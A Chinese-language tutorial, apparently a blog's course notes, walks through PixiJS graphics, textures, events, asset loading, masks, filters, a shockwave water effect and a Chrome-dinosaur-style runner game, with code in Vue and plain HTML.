    const deadAnimation = new PIXI.AnimatedSprite(deadTextures);
    deadAnimation.animationSpeed = 0.1;
    deadAnimation.play();
    deadAnimation.visible = false;
    container.addChild(deadAnimation);
    // 恐龙跳跃精灵
    const jumpTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680, 0, 82, frameHeight)
    );
    const jumpSprite = new PIXI.Sprite(jumpTexture);
    jumpSprite.visible = false;
    container.addChild(jumpSprite);
    // 地面精灵
    const groundTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(50, 100, 2300, 30)
    );
    // 设置纹理水平镜像重复
    groundTexture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;

    const groundSprite = new PIXI.TilingSprite(groundTexture);
    groundSprite.width = window.innerWidth;
    groundSprite.height = 30;
    // 设置地面精灵的位置
    groundSprite.position.set(0, window.innerHeight - 50);

    container.addChild(groundSprite);
    // 仙人掌精灵
    const cactusTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(515, 0, 30, 60)
    );
    const cactusSprite = new PIXI.Sprite(cactusTexture);
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 1.5);
    cactusSprite.y = window.innerHeight - 50 - 50;
    container.addChild(cactusSprite);

    ​ 创建提示文字,点击 开始游戏 时,开始游戏:

    // 创建文字
    let hintsText = new PIXI.Text("开始游戏", {
    fontSize: 30,
    fill: 0x333333,
    align: "center",
    });
    hintsText.x = app.screen.width / 2;
    hintsText.y = app.screen.height / 2;
    hintsText.anchor.set(0.5);
    container.addChild(hintsText);
    hintsText.interactive = true;
    hintsText.on("click", () => {
    playGame();
    });
    hintsText.addEventListener('touchstart', function (event) {
    playGame();
    });

    ​ 开始游戏的逻辑:

    let isGameing = false;
    let score = 0;
    let jumpVelocity = 1200; // 跳跃初速度,单位:像素/秒
    let gravity = 5000; // 重力加速度,单位:像素/秒^2

    // 开始游戏
    function playGame(e) {
    hintsText.text = "得分:" + score;
    // 恐龙跑步动画;
    runAnimation.x = 60;
    runAnimation.y = window.innerHeight - 50 - frameHeight;
    runAnimation.visible = true;
    // 恐龙死亡动画;
    deadAnimation.x = 60;
    deadAnimation.y = window.innerHeight - 50 - frameHeight;
    deadAnimation.visible = false;
    // 恐龙跳跃精灵
    jumpSprite.x = 60;
    jumpSprite.y = window.innerHeight - 50 - frameHeight;
    jumpSprite.visible = false;

    // 移除开始游戏的点击和触摸事件监听器
    hintsText.interactive = false;
    hintsText.off("click");
    hintsText.removeEventListener('touchstart', playGame);

    // 可以考虑在这里添加一个小延迟再添加跳跃的事件监听器,以避免立即触发跳跃
    setTimeout(() => {
    window.addEventListener("keydown", (e) => {
    if (e.code === "Space") {
    jump();
    }
    });
    app.view.addEventListener('click', jump);
    app.view.addEventListener('touchstart', jump);
    }, 100); // 延迟 100 毫秒添加跳跃事件监听器

    isGameing = true;
    }

    ​ 跳跃逻辑:

    function jump() {
    if (isGameing && !jumpSprite.visible) {
    runAnimation.visible = false;
    jumpSprite.visible = true;
    jumpVelocity = 1200; // 确保每次跳跃前都重置了跳跃速度
    }
    }

    ​ 实时控制游戏逻辑:

    app.ticker.add((delta) => {
    if (isGameing) {
    hintsText.text = "得分:" + score;
    // 获取自上一帧以来的秒数
    let deltaTime = app.ticker.deltaMS / 1000;
    // 计算基于时间的移动距离
    const groundSpeed = 1000 * deltaTime * Math.log10(10 + score);
    const cactusSpeed = groundSpeed;
    // 地面精灵
    groundSprite.tilePosition.x -= groundSpeed;
    // 仙人掌精灵
    cactusSprite.x -= cactusSpeed;

    if (cactusSprite.x <= -30) {
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 2);
    score++;
    }

    if (jumpSprite.visible) {
    // 根据deltaTime调整跳跃速度和重力
    jumpVelocity -= gravity * deltaTime; // 跳跃速度随时间减小
    jumpSprite.y -= jumpVelocity * deltaTime; // 根据跳跃速度更新位置

    // 检查是否落地
    if (jumpSprite.y >= window.innerHeight - 50 - frameHeight) {
    console.log("跳跃结束");
    jumpSprite.y = window.innerHeight - 50 - frameHeight; // 确保不会穿过地面
    runAnimation.visible = true;
    jumpSprite.visible = false;
    }
    }

    // 判断跳跃精灵与仙人掌精灵是否碰撞
    if (
    jumpSprite.y > cactusSprite.y - 60 &&
    jumpSprite.x + 60 > cactusSprite.x &&
    jumpSprite.x - 60 < cactusSprite.x
    ) {
    // 游戏结束
    gameOver();
    }
    } else {
    return;
    }
    });

    ​ 游戏结束逻辑:

    function gameOver() {
    console.log("游戏结束");
    // 游戏结束
    isGameing = false;
    deadAnimation.visible = true;
    runAnimation.visible = false;
    jumpSprite.visible = false;
    hintsText.text = "游戏结束,最后得分:" + score;
    hintsText.interactive = true;
    hintsText.on("click", () => {
    location.reload();
    });
    hintsText.addEventListener('touchstart', function (event) {
    location.reload();
    });
    }

    演示(emmm 手机上玩起来适配还不是很好……)

    ]]>
    + 资源

    课程

    01-Pixi 初识和搭建 Pixi 应用

• 全局安装 @vue/cli:
    npm install -g @vue/cli
    • 全局安装 yarn
npm install -g yarn
    • 项目文件下命令行创建 Vue 项目(好家伙这就 100 来 MB……):
    vue create 01-pixiapp

    创建 Vue

    • 转到这个项目:
    cd 01-pixiapp
    • 安装 pixi.js
    yarn add pixi.js
    • 启动项目:
    yarn serve

    启动服务器


    • 编辑 01-pixiapp/App.vue
    <template>
    <div></div>
    </template>

    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 填充颜色
    rectangle.drawRect(200, 200, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);

    </script>

    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

    ​ HTML 下使用 <script src="https://pixijs.download/release/pixi.js"></script> 直接导入 pixi.js

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>
    </head>
    <body>
    </body>
    <script src="https://pixijs.download/release/pixi.js"></script>
    <script>
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 填充颜色
    rectangle.drawRect(200, 200, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    </script>
    </html>

    ​ Vue 代码解释:

    ​ 这部分定义了组件的 HTML 结构。在这个例子中,模板仅包含一个空的 <div> 元素。实际上,这个 <div> 在此示例中未直接使用,因为 PixiJS 的画布 (canvas) 是通过脚本直接添加到 document.body 中的,而不是被插入到这个 <div> 内。

    <template>
    <div></div>
    </template>

    ​ 这部分是组件的 JavaScript 逻辑,主要做了以下几件事情:

    1. 导入 PixiJS:使用 import 语句导入 PixiJS 库。
    2. 创建 PixiJS 应用:实例化一个新的 PixiJS Application 对象,并设置其大小和背景颜色等属性。这个应用对象会自动生成一个 <canvas> 元素。
3. 将 <canvas> 元素添加到 DOM:通过 document.body.appendChild(app.view); 将 PixiJS 创建的 <canvas> 元素添加到 HTML 文档的 <body> 中。
    4. 绘制图形:使用 PixiJS 的 Graphics 类创建一个矩形,并设置其填充颜色和位置,最后将这个矩形添加到 PixiJS 应用的舞台(stage)上,以便显示。
    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth, // 宽度设置为窗口宽度
    height: window.innerHeight, // 高度设置为窗口高度
    backgroundColor: 0x1099bb, // 背景颜色设置为浅蓝色
    resolution: window.devicePixelRatio || 1, // 分辨率设置为设备的像素比或默认值 1
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 开始填充颜色为浅蓝色
    rectangle.drawRect(200, 200, 164, 64); // 在坐标 (200, 200) 处绘制一个 164 x 64 大小的矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    </script>

    ​ 这部分定义了页面的 CSS 样式:

• 重置所有元素的 margin 和 padding,并将 box-sizing 设置为 border-box,以确保布局的一致性。
    • 设置 <canvas> 元素的样式,使其宽度和高度分别占满视口的宽度和高度,并通过 position: fixed 确保 <canvas> 始终覆盖整个视口。
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

    ​ 打开 http://localhost:8080/

    渲染效果

    02-Pixi图形Graphics具体应用

    ​ 使用 Pixi 创建其它图形,设置:

    • 缩放:scale.set()
    • 位移:position.set()
    • 旋转:rotation
    • 锚点:pivot.set()
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.lineStyle(4, 0xff0000, 1); // 设置边框样式:线宽,线颜色,透明度
    rectangle.beginFill(0x66ccff, 0.9); // 填充颜色
    rectangle.drawRect(0, 0, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 图形的缩放
    rectangle.scale.set(2, 2);
    // 图形的位移
    rectangle.position.set(100, 100);
    // 图形的旋转
    rectangle.rotation = 0.5;
    // 图形的锚点
    rectangle.pivot.set(82, 32);

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);

    // 创建一个圆形
    const circle = new PIXI.Graphics();
    circle.beginFill(0x66ccff, 0.9);
    circle.drawCircle(0, 0, 32);
    circle.endFill();
    circle.position.set(300, 300);
    app.stage.addChild(circle);

    03-Pixi绘制各种常见图形

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.lineStyle(4, 0xff0000, 1); // 设置边框样式:线宽,线颜色,透明度
    rectangle.beginFill(0x66ccff, 0.9); // 填充颜色
    rectangle.drawRect(0, 0, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充
    // 图形的缩放
    rectangle.scale.set(2, 2);
    // 图形的位移
    rectangle.position.set(100, 100);
    // 图形的旋转
    rectangle.rotation = 0.5;
    // 图形的锚点
    rectangle.pivot.set(82, 32);
    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    // 创建一个圆形
    const circle = new PIXI.Graphics();
    circle.beginFill(0x66ccff, 0.9);
    circle.drawCircle(0, 0, 32);
    circle.endFill();
    circle.position.set(300, 300);
    app.stage.addChild(circle);
    // 创建圆角矩形
    const roundedRectangle = new PIXI.Graphics();
    roundedRectangle.beginFill(0x66ccff, 0.9);
    /* 绘制圆角矩形,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是宽度,
    第四个参数是高度,
    第五个参数是圆角半径
    */
    roundedRectangle.drawRoundedRect(0, 0, 164, 64, 10);
    roundedRectangle.endFill();
    roundedRectangle.position.set(500, 500);
    app.stage.addChild(roundedRectangle);
    // 绘制椭圆
    const ellipse = new PIXI.Graphics();
    ellipse.beginFill(0x66ccff, 0.9);
/* 绘制椭圆,
第一个参数是圆心 x 坐标,
第二个参数是圆心 y 坐标,
第三个参数是横向半径,
第四个参数是纵向半径
*/
    ellipse.drawEllipse(0, 0, 164, 164);
    ellipse.endFill();
    ellipse.position.set(700, 700);
    app.stage.addChild(ellipse);
    // 绘制多边形
    const polygon = new PIXI.Graphics();
    polygon.beginFill(0x66ccff, 0.9);
    // 绘制多边形,参数是一个数组,数组中的每个元素是一个点的坐标,每两个元素是一个点的 x 坐标和 y 坐标。
    polygon.drawPolygon([0, 0, 100, 0, 100, 100, 0, 100]);
    polygon.endFill();
    polygon.position.set(50, 300);
    app.stage.addChild(polygon);
    // 绘制圆弧(扇形)
    const arc = new PIXI.Graphics();
    arc.beginFill(0x660000, 0.9);
    /* 绘制圆弧,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是半径,
    第四个参数是起始角度,
    第五个参数是结束角度。
    第六个参数是是否逆时针
    */
    arc.arc(0, 0, 32, 0, Math.PI, false);
    arc.endFill();
    arc.position.set(300, 50);
    app.stage.addChild(arc);
    // 绘制线段
    const line = new PIXI.Graphics();
    line.lineStyle(4, 0xff0000, 1);
    line.moveTo(0, 0); // 设置线段的起始点
    line.lineTo(100, 100); // 设置线段的结束点
    line.lineTo(200, 0);
    line.position.set(500, 50);
    app.stage.addChild(line);

    渲染效果

    04-Pixi纹理与动画实现

    ​ 使用代码创建一个木剑的旋转动画:

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");

    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);

    // 设置精灵的锚点
    sprite.anchor.set(0.5, 0.5);

    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵旋转 45 度
    sprite.rotation = Math.PI / 4;

    // 设置精灵的缩放
    sprite.scale.set(2, 2);

    // 设置精灵的透明度
    sprite.alpha = 0.5;

    app.stage.addChild(sprite);

    // ticker 实现动画
    app.ticker.add((delta) => {
    console.log(delta);
    sprite.rotation += 0.01 * delta;
    })
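
​ 顺带一提:回调里的 delta 是按 60 FPS 归一化的帧数(满 60 帧时约为 1)。如果希望转速与帧率完全无关,可以改用 app.ticker.deltaMS 换算成秒。下面是一个小示意(非原教程代码,沿用上面的 app 与 sprite):

// 示意:用 deltaMS 实现与帧率无关的匀速旋转
app.ticker.add(() => {
const dt = app.ticker.deltaMS / 1000; // 距上一帧的秒数
sprite.rotation += Math.PI * 0.2 * dt; // 每秒固定旋转 0.2π 弧度
});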

    演示

    05-Pixi事件交互

    ​ 在上一节的代码上,继续追加交互的代码:

    sprite.interactive = true;
    sprite.on("click", () => {
    sprite.alpha = 1;
    });
    sprite.on("pointerenter", () => {
    sprite.alpha = 0.75;
    });
    sprite.on("pointerout", () => {
    sprite.alpha = 0.5;
    });

    ​ 如下所示,当鼠标点击 / 移入 / 移出 木剑时,将产生一定的交互效果。

    演示
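
​ 另外,据我了解,较新的 PixiJS(v7.2 起)推荐用 eventMode 代替 interactive 来开启交互,旧写法仍然兼容;补一个等价写法的示意(非原教程代码):

// 示意:v7.2+ 的等价写法
sprite.eventMode = "static"; // 相当于 sprite.interactive = true
sprite.cursor = "pointer"; // 鼠标悬停时显示手型光标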

    06-Pixi资源管理

    ​ 两种不同的资源加载方式:

    // 添加资源
    PIXI.Assets.add("sword", "./textures/jian.png");
    PIXI.Assets.add("man", "./textures/man.png");
    PIXI.Assets.add("woodenSword", "./textures/mujian.png");

    // 异步加载资源
    const texturesPromise = PIXI.Assets.load(["sword", "man", "woodenSword"], (progress) => {
console.log("加载进度:", progress);
    });
    // 添加场景一资源
    PIXI.Assets.addBundle("scene1", {
    sword: "./textures/jian.png",
    man: "./textures/man.png",
    woodenSword: "./textures/mujian.png",
    });

    const texturesPromise = PIXI.Assets.loadBundle("scene1", (progress) => {
console.log("加载进度:", progress);
    });

    ​ 操作一下所创建的资源对象 texturesPromise

    // 加载完成后创建精灵
    texturesPromise.then((textures) => {
    // 创建容器
    const container = new PIXI.Container();
    // 创建精灵
    const sprite = new PIXI.Sprite(textures.sword);
    // 设置精灵位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;
    // 设置精灵锚点
    sprite.anchor.set(0.5);
    // 设置精灵缩放
    sprite.scale.set(0.5);
    // 设置精灵透明度
    sprite.alpha = 0.5;
    // 设置精灵旋转
    sprite.rotation = 0.5;
    // 设置精灵混合模式
    sprite.blendMode = PIXI.BLEND_MODES.ADD;
    // 设置精灵交互
    sprite.interactive = true;
    // 设置精灵鼠标样式
    sprite.buttonMode = true;
    // 设置精灵鼠标事件
    sprite.on("pointerdown", () => {
    console.log("pointerdown");
    });
    container.addChild(sprite);

    // 创建精灵
    const sprite2 = new PIXI.Sprite(textures.man);
    sprite2.scale.set(0.1);
    container.addChild(sprite2);
    app.stage.addChild(container);
    });
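
​ 补充一点:PIXI.Assets 会按别名缓存资源,已经 add 过的资源也可以按别名单独加载、重复取用;一个小示意(非原教程代码):

// 示意:按别名单独加载某一个资源,结果会被 Assets 缓存
PIXI.Assets.load("sword").then((swordTexture) => {
const sword = new PIXI.Sprite(swordTexture);
app.stage.addChild(sword);
});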

    演示

    07-Pixi文字与遮罩

使用 new PIXI.Text() 创建文字对象:

    // 显示 hello world 文字
    const text = new PIXI.Text("Hello World", {
    fontFamily: "Arial",
    fontSize: 120,
    fill: 0xff0000,
    align: "center",
    });

    // 设置文字位置
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;

    // 设置文字锚点
    text.anchor.set(0.5);
    app.stage.addChild(text);

    演示

通过 mask 给精灵设置另一个精灵做遮罩:

    // 创建一个精灵
    const bg = PIXI.Sprite.from("./textures/bg.png");
    bg.width = app.screen.width;
    bg.height = app.screen.height;
    // 使用文字作为精灵的遮罩
    bg.mask = woodenSword;
    app.stage.addChild(bg);
    app.stage.addChild(woodenSword);
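
​ 这段代码里的 woodenSword 是之前创建好的木剑精灵,原文没有贴出创建过程;补一个最小的创建示意(假设沿用前文的纹理路径):

// 示意:创建用作遮罩的木剑精灵(纹理路径沿用前文,属假设)
const woodenSword = PIXI.Sprite.from("./textures/mujian.png");
woodenSword.anchor.set(0.5);
woodenSword.x = app.screen.width / 2;
woodenSword.y = app.screen.height / 2;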

    演示

    ​ 使用文字作为遮罩:

    // 显示 hello world 文字
    const text = new PIXI.Text("Hello World", {
    fontFamily: "Arial",
    fontSize: 120,
    fill: 0xff0000,
    align: "center",
    });

    // 设置文字位置
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;

    // 设置文字锚点
    text.anchor.set(0.5);

    // 创建一个精灵
    const bg = PIXI.Sprite.from("./textures/bg.png");
    bg.width = app.screen.width;
    bg.height = app.screen.height;
    // 使用文字作为精灵的遮罩
    bg.mask = text;
    app.stage.addChild(bg);

    演示

    08-Pixi滤镜特效

    ​ 先创建一个精灵用于操作:

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加至舞台
    app.stage.addChild(sprite);

    自带滤镜:模糊

    // 创建模糊滤镜
    const blurFilter = new PIXI.BlurFilter();
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 20;
    // 将模糊滤镜添加到精灵上
    sprite.filters = [blurFilter];

    // 监听鼠标是否进入精灵
    sprite.interactive = true;
    sprite.on("pointerover", () =>{
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 0;
    });
    sprite.on("pointerout", () =>{
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 20;
    });

    演示

    pixi-filters:扩展滤镜:轮廓与辉光

    ​ 使用:

    yarn add pixi-filters

    安装,然后使用

    import {XXXFilter} from "pixi-filters";

    来导入。

    Vue 下输入代码:

    <template>
    <div></div>
    </template>

    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';
    import {OutlineFilter} from 'pixi-filters';
    import {GlowFilter} from 'pixi-filters';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加到舞台
    app.stage.addChild(sprite);

// 创建轮廓滤镜
const outlineFilter = new OutlineFilter(5, 0xffff00); // 5 为轮廓宽度,0xffff00 为轮廓颜色
    // 创建发光滤镜
    const glowFilter = new GlowFilter({
    distance: 50,
    outerStrength: 1,
    innerStrength: 0,
    color: 0xff0000,
    quality: 0.5,
    });
// 将轮廓滤镜和发光滤镜添加到精灵上
    sprite.filters = [outlineFilter, glowFilter];

    </script>

    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>
    <script src="https://cdn.jsdelivr.net/npm/pixi-filters@latest/dist/browser/pixi-filters.min.js"></script>

​ HTML 下使用代码(将 OutlineFilter 和 GlowFilter 分别改为 PIXI.filters.OutlineFilter 和 PIXI.filters.GlowFilter):

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加到舞台
    app.stage.addChild(sprite);

// 创建轮廓滤镜
const outlineFilter = new PIXI.filters.OutlineFilter(5, 0xffff00); // 5 为轮廓宽度,0xffff00 为轮廓颜色
    // 创建发光滤镜
    const glowFilter = new PIXI.filters.GlowFilter({
    distance: 50,
    outerStrength: 1,
    innerStrength: 0,
    color: 0xff0000,
    quality: 0.5,
    });
// 将轮廓滤镜和发光滤镜添加到精灵上
    sprite.filters = [outlineFilter, glowFilter];

    演示

    09-应用Pixi实现波浪水滴特效主页

    ​ 创建场景:一个背景以及一个带阴影的文字对象。

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/car.jpg");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    sprite.width = app.screen.width;
    sprite.height = app.screen.height;

    // 创建容器
    const container = new PIXI.Container();
    // 将精灵添加到容器中
    container.addChild(sprite);
    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加文字
    const text = new PIXI.Text("Hello PixiJS", {
    fontFamily: "Arial",
    fontSize: 30 + Math.floor(app.screen.width * 0.1),
    fill: 0xffffff,
    align: "center",
    dropShadow: true,
    dropShadowColor: "#000000",
    dropShadowBlur: 4,
    dropShadowAngle: Math.PI / 2,
    dropShadowDistance: 2,
    });
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;
    text.anchor.set(0.5);
    container.addChild(text);

    09_1

    ​ 添加置换滤镜:

    // 添加置换滤镜
    const displacementSprite = PIXI.Sprite.from("./textures/displacement.jpg");
    displacementSprite.scale.set(0.5);
    displacementSprite.texture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;
    const displacementFilter = new PIXI.DisplacementFilter(displacementSprite);
    container.addChild(displacementSprite);

    ​ 一个置换图 displacement.jpg 实现画面涟漪的效果:

    displacement.jpg

​ 定义大、中、小三种震波滤镜(需要 pixi-filters 支持):

    // 添加震波滤镜
    const shockwaveFilter1 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 80, //半径
    waveLength: 40, //波长
    amplitude: 40, //振幅
    speed: 200,
    },
    0
    );

    const shockwaveFilter2 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 100, //半径
    waveLength: 45, //波长
    amplitude: 80, //振幅
    speed: 240,
    },
    0
    );

    const shockwaveFilter3 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 160, //半径
    waveLength: 65, //波长
    amplitude: 105, //振幅
    speed: 300,
    },
    0
    );

    ​ 应用这些滤镜(app.ticker.add 有点像 Unity 里的 Update()):

    container.filters = [
    displacementFilter,
    shockwaveFilter1,
    shockwaveFilter2,
    shockwaveFilter3,
    ];

    ​ 随机创建震波滤镜:

    app.ticker.add((delta) => {
    displacementSprite.x += 1;
    displacementSprite.y += 1;
    createWave(shockwaveFilter1, 1);
    createWave(shockwaveFilter2, 1.2);
    createWave(shockwaveFilter3, 0.7);
    });

    function createWave(waveFilter, resetTime) {
    waveFilter.time += 0.01;
    if (waveFilter.time > resetTime) {
    waveFilter.time = 0;
    waveFilter.center = [
    Math.random() * app.screen.width,
    Math.random() * app.screen.height,
    ];
    }
    }

    ​ 设置点击创建震波滤镜的效果:

    // 监听点击事件,根据位置创建震波滤镜
    app.view.addEventListener("click", (e) => {
    console.log(e.clientX, e.clientY);
    shockwaveFilter3.center = [e.clientX, e.clientY];
    shockwaveFilter3.time = 0;
    });

    演示

    10-pixijs开发谷歌恐龙跑酷小游戏

    ​ 我在原教程的基础上魔改了一些内容。

    ​ 创建应用,导入 baseTexture(是一个雪碧图):

    雪碧图

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0xffffff,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建容器
    const container = new PIXI.Container();

    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加恐龙小游戏的精灵纹理
    const baseTexture = PIXI.BaseTexture.from("./textures/game.png");

    ​ 设置恐龙的宽高:

    const frameWidth = 88;
    const frameHeight = 100;

    ​ 创建各种资源:

    // 创建恐龙纹理
    const dinoTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(75, 0, frameWidth, frameHeight)
    );
    // 创建恐龙精灵
    const dino = new PIXI.Sprite(dinoTexture);
    dino.visible = false;
    container.addChild(dino);
    // 恐龙跑步动画;
    const runTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1675, 0, frameWidth, frameHeight)
    );
    const runSprite = new PIXI.Sprite(runTexture);
    runSprite.visible = false;
    container.addChild(runSprite);

    let runTextures = [];
    for (let i = 0; i < 2; i++) {
    runTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (2 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const runAnimation = new PIXI.AnimatedSprite(runTextures);
    runAnimation.animationSpeed = 0.1;
    runAnimation.play();
    runAnimation.visible = false;
    container.addChild(runAnimation);
    // 恐龙死亡动画;
    let deadTextures = [];
    for (let i = 0; i < 2; i++) {
    deadTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (0 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const deadAnimation = new PIXI.AnimatedSprite(deadTextures);
    deadAnimation.animationSpeed = 0.1;
    deadAnimation.play();
    deadAnimation.visible = false;
    container.addChild(deadAnimation);
    // 恐龙跳跃精灵
    const jumpTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680, 0, 82, frameHeight)
    );
    const jumpSprite = new PIXI.Sprite(jumpTexture);
    jumpSprite.visible = false;
    container.addChild(jumpSprite);
    // 地面精灵
    const groundTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(50, 100, 2300, 30)
    );
// 设置纹理重复平铺(REPEAT)
    groundTexture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;

    const groundSprite = new PIXI.TilingSprite(groundTexture);
    groundSprite.width = window.innerWidth;
    groundSprite.height = 30;
    // 设置地面精灵的位置
    groundSprite.position.set(0, window.innerHeight - 50);

    container.addChild(groundSprite);
    // 仙人掌精灵
    const cactusTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(515, 0, 30, 60)
    );
    const cactusSprite = new PIXI.Sprite(cactusTexture);
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 1.5);
    cactusSprite.y = window.innerHeight - 50 - 50;
    container.addChild(cactusSprite);
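
​ 这里用到的 getRandomInt 原文没有给出,按用法推测是一个取区间随机整数的辅助函数;一个最小示意:

// 示意:返回 [min, max) 内的随机整数(按上文用法推测的辅助函数)
function getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min)) + min;
}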

​ 创建提示文字,点击“开始游戏”时开始游戏:

    // 创建文字
